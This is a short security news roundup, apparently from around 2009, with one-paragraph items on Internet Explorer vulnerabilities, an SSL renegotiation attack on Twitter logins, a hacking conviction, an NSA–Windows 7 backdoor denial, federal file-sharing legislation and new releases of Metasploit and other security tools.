A zero-day vulnerability has been reported in Internet Explorer that can allow attackers to execute arbitrary code by luring visitors to a malicious web page. Internet Explorer versions 6 and 7 are affected by the exploit, which focuses on the way that IT uses cascading style sheets.
It's been a bad week for Internet Explorer in general. The Register reports that a flaw in Internet Explorer 8 can be used to introduce cross-site scripting on otherwise-safe web pages.
Researchers have already worked out how to use the SSL renegotiation bug that was uncovered by PhoneFactor earlier this month. Turkish graduate student Anil Kurmus figured out how to steal Twitter login credentials passing through encrypted data streams.
40 year-old Steven Jinwoo Kim has been convicted of hacking the computer systems of GEXA Energy, his former employer. He cost GEXA at least $100 000, according to reports. He faces up to five years in jail and a maximum $250 000 fine.
The city of Edmonton, Alberta has lost one mobile device per month [pdf] over the past four years on average, according to a report from its Auditor.
Intelligence industry-backed venture capital fund In-Q-Tel has invested in west coast firm FireEye, which was recently responsible for taking down the Mega-D botnet.
Another release of Windows, another conspiracy theory. Microsoft is insisting that it didn't build a backdoor in Windows 7 for the National Security Agency. NSA executives said that they had worked with the OS vendor to "enhance Microsoft's operating system security guide". This isn't the first time that Microsoft has been accused of such shenanigans. A CNN story from 1999 alleged the same thing.
Legislation has been introduced that would prohibit the use of peer-to-peer filesharing software on federal networks. The House Oversight and Government Reform Committee introduced the Secure Federal File Sharing Act to lock down the use of such software after sensitive information from a congressional investigation leaked from a government worker's home PC.
Metasploit version 3.3 is out, with over 180 bug fixes, Windows 7 compatibility, and Oracle exploit support.
Version 23 of [In]Secure magazine [PDF] is out.
The Katana 1.0 portable multi-boot security suite is out. It features all of the best security distributions on one USB drive, including Backtrack, The Organizational Systems Wireless Auditor Assistant, and over 100 portable Windows security applications.
WhiteHat Security has said that nearly two-thirds of websites have at least one critical security issue.